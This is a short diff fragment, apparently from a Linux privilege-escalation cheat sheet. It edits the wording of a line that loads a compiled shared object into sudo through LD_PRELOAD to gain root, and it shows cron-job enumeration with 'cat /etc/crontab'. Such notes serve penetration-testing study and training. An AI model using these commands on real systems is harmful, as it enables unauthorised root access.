 gcc -fPIC -shared -nostartfiles -o /tmp/pe.so /tmp/pe.c

-sudo LD_PRELOAD=/tmp/pe.so <any_sudo_binary>
+sudo LD_PRELOAD=/tmp/pe.so <any_allowed_sudo_binary>

 Cron Jobs

-# View cron jobs
+# View all cron jobs

 cat /etc/crontab